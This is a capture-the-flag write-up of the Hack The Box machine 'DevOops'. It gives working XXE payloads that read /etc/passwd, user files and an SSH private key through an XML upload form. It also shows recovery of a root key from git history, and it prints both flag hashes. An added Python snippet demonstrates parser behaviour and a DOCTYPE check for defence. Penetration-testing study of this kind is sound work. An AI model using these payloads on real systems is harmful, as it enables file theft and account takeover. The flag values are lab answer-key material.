Linux Boxes

devoops

  1. nmapAutomator.sh
    1. recon
      1. gobuster
      2. nikto
  2. http (port 5000) gunicorn
    1. /feed
    2. /upload
      1. test.xml
  3. XML XXE Injection foothold
    1. payloadallthethings XXE
    2. /etc/passwd
    3. leak user.txt
    4. /.ssh/id_rsa
    5. ssh login
  4. privesc
    1. LinEnum.sh
    2. roosa bash_history
    3. git log
      1. "reverted accidental commit " log
      2. git show
        1. unknown id_rsa
    4. ssh to root
  5. user/root
  6. lessons learned

devoops


nmapAutomator.sh

recon

gobuster
nikto

gobuster


/feed
/upload

nikto


http (port 5000) gunicorn

A todo note on the page is worth noting, as is the domain it mentions:
dev.solita.fi

The service is gunicorn, a Python web server.

/feed

Although this page looks like a web page written in HTML, it is just a picture.

/upload

We might be able to upload a webshell here; let's check it out.

test.xml

There is an XML note on the upload page, so let's try uploading a test.xml file.

The web page mentions Author, Subject and Content fields in its BLOGPOST note, so let's write an XML file that contains those elements:


<?xml version="1.0"?>
<test>
<Author>test</Author>
<Subject>test</Subject>
<Content>test</Content>
</test>


XML XXE Injection foothold


payloadallthethings XXE

Check out the XXE section of PayloadsAllTheThings on GitHub.

<?xml version="1.0"?>
<!DOCTYPE test [<!ENTITY example "Doe">]>
<test>
<Author>&example;</Author>
<Subject>test</Subject>
<Content>test</Content>
</test>




Since the Author element comes back with the entity replaced by the string "Doe", we know our XXE exploit is working as intended. Let's see if we can leak some sensitive files next.

/etc/passwd

Applying this to our existing payload, we just have to update the DOCTYPE declaration so the entity reads a file, and reference that entity in the Author element:
<?xml version="1.0"?>
<!DOCTYPE test [<!ENTITY test SYSTEM "file:///etc/passwd">]>
<test>
<Author>&test;</Author>
<Subject>test</Subject>
<Content>test</Content>
</test>



The server response leaks /etc/passwd!
Enumerating the response further shows there is a user named roosa.
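As an added illustration (not part of this writeup, and not the box's own application code, whose XML parser is unknown), here is how the "Doe" probe and the file-read payload above behave against Python's stdlib parser, together with a DOCTYPE check a defender can put in front of an upload handler; the three sample documents are constructed here in the BLOGPOST shape the page describes.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample uploads in the BLOGPOST shape (Author/Subject/Content).
BENIGN = b"""<?xml version="1.0"?>
<test><Author>test</Author><Subject>test</Subject><Content>test</Content></test>"""

# The "Doe" probe: an internal entity that a DTD-processing parser substitutes.
INTERNAL_ENTITY = b"""<?xml version="1.0"?>
<!DOCTYPE test [<!ENTITY example "Doe">]>
<test><Author>&example;</Author><Subject>test</Subject><Content>test</Content></test>"""

# The file-read payload from the writeup: an external entity pointing at a local file.
EXTERNAL_ENTITY = b"""<?xml version="1.0"?>
<!DOCTYPE test [<!ENTITY test SYSTEM "file:///etc/passwd">]>
<test><Author>&test;</Author><Subject>test</Subject><Content>test</Content></test>"""

DOCTYPE_RE = re.compile(rb"<!DOCTYPE", re.IGNORECASE)


def has_dtd(data: bytes) -> bool:
    """Detection/hardening check: the upload format needs no DTD, so a DOCTYPE
    in a submitted document is reason enough to reject it before parsing."""
    return DOCTYPE_RE.search(data) is not None


def parse_fields(data: bytes) -> str:
    """Parse with the stdlib parser and report what it did. xml.etree expands
    internal entities (the "Doe" probe comes back substituted) but never
    resolves external ones: it raises ParseError instead of reading the file."""
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return f"rejected: {exc}"
    return f"parsed: Author={root.findtext('Author')!r}"


def accept_upload(data: bytes) -> str:
    """Hardened handler: refuse any DTD outright, then parse what remains."""
    if has_dtd(data):
        return "rejected: DOCTYPE not allowed in uploads"
    return parse_fields(data)


if __name__ == "__main__":
    for name, doc in (("benign", BENIGN), ("doe-probe", INTERNAL_ENTITY),
                      ("file-read", EXTERNAL_ENTITY)):
        print(f"{name}: stdlib -> {parse_fields(doc)} | hardened -> {accept_upload(doc)}")
```

The stdlib parser still expands internal entities, so it does not protect against entity-expansion (billion laughs) DoS; defusedxml's ElementTree.fromstring refuses entities and external references by default and is the usual drop-in.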

leak user.txt

We can leak user.txt by pointing the SYSTEM entity's file URL at /home/roosa/user.txt.

/.ssh/id_rsa

Let's see if we can leak an SSH key by guessing that roosa has an id_rsa file in the .ssh folder of her home directory.

We have roosa's private key!
Now we save it to a file named id_rsa and give it the restrictive permissions ssh requires.
ssh login

We can log into roosa's account with the RSA key we leaked through the XXE attack.

privesc

LinEnum.sh


roosa bash_history

We see a line in roosa's bash_history that refers to a git commit message about an accidental key commit that had to be replaced. Could that be root's private key?

git log

To look at the repository's git history on the server, use
git log

"reverted accidental commit " log

We found the commit ID that pertains to the note we saw earlier in roosa's bash_history; we can print the contents of this commit with its ID:

33e87c312c08735a02fa9c796021a4a3023129ad

git show

To show the contents of the commit, use
git show 33e87c312c08735a02fa9c796021a4a3023129ad

Let's paste the key into a file on our local machine and give it proper permissions.

unknown id_rsa

Every line of the pasted key begins with a troublesome '-' (the diff prefix from git show's output). In vim, use :%s/^-// to strip it from every line,
where
:%s/ starts a substitution over every line of the file
^-// replaces a dash at the start of the line with nothing
(no g flag is needed: only the first dash on each line is the diff prefix)

:%s/-//g would remove all the dashes, but don't use that here because it'll also strip the dashes from the BEGIN and END header and footer of the key.

ssh to root

ssh -i unknown_id_rsa root@10.10.10.91

user/root

user.txt: c5808e1643e801d40f09ed87cdecc67b

root.txt: d4fe1e7f7187407eebdd3209cb1ac7b3

lessons learned

Check out Rana Khalil's OSCP write-ups and prep at https://rana-khalil.gitbook.io/hack-the-box-oscp-preparation/

https://docs.github.com/en/github/authenticating-to-github/removing-sensitive-data-from-a-repository